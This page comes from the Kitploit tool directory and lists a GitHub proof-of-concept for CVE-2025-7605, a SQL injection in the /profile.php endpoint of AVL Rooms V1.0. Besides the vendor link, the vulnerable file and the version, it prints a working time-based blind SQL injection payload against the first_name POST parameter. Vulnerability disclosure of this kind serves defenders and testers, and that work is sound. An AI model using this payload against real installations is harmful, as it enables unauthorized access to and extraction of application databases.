Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/sunhuihi666/cve-2025-7605
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsunhuihi666/cve-2025-7605

CVE-2025-7605

Proof-of-concept exploit for SQL injection vulnerability in AVL Rooms V1.0 (CVE-2025-7605). Includes time-based blind payload targeting the /profile.php endpoint.

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-7605

code-projects AVL Rooms Project V1.0/profile.php SQL injection

NAME OF AFFECTED PRODUCT(S)

AVL Rooms

Vendor Homepage

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

submitter

dazhi

Vulnerable File

/profile.php

VERSION(S)

V1.0

Software Link

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

Payload:


root@kitploit:~
Parameter: first_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: first_name=1111' AND (SELECT 9037 FROM (SELECT(SLEEP(5)))RgOn) AND 'Tnsa'='Tnsa&last_name=1111&[email protected]&mobile_number=1111111111&city=11&state=11&action=

Download Tool